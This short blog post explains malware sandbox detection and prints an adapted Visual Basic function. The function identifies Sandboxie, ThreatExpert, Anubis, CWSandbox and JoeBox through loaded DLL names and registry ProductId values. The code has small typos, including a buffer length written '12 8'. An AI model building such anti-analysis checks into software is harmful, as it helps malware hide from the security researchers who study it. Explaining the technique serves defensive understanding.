In the last period, malware evolved to new Detection Ways, like Sandbox Awareness, if a malware is executed into one of the most famous Sandboxes it block execution.
Here a little piece of code taken fro a malware and readapted:
Public Function IsInSandbox() As Boolean
Dim hKey As Long, hOpen As Long, hQuery As Long, hSnapShot As Long
Dim me32 As MODULEENTRY32
Dim szBuffer As String * 128
hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, GetCurrentProcessId)
me32.dwSize = Len(me32)
Module32First hSnapShot, me32
Do While Module32Next(hSnapShot, me32) <> 0
If InStr(1, LCase(me32.szModule), “sbiedll.dll”) > 0 Then ‘Sandboxie
IsInSandbox = True
ElseIf InStr(1, LCase(me32.szModule), “dbghelp.dll”) > 0 Then ‘ThreatExpert
IsInSandbox = True
End If
Loop
CloseHandle (hSnapShot)
If IsInSandbox = False Then
hOpen = RegOpenKeyEx(HKEY_LOCAL_MACHINE, “Software\Microsoft\Windows\CurrentVersion”, 0, KEY_ALL_ACCESS, hKey)
If hOpen = 0 Then
hQuery = RegQueryValueEx(hKey, “ProductId”, 0, REG_SZ, szBuffer, 12 8)
If hQuery = 0 Then
If InStr(1, szBuffer, “76487-337-8429955-22614″) > 0 Then ‘Anubis
IsInSandbox = True
ElseIf InStr(1, szBuffer, “76487-644-3177037-23510″) > 0 Then ‘CWSandbox
IsInSandbox = True
ElseIf InStr(1, szBuffer, “55274-640-2673064-23950″) > 0 Then ‘JoeBox
IsInSandbox = True
End If
End If
End If
RegCloseKey (hKey)
End If
End Function
It detects Sandboxie, ThreatExpert, JoeBox, CWSandBox and Anubis, by checking the Product Id or the presence of usual dll like sbiedll.dll and sbiedll.dll
No comments:
Post a Comment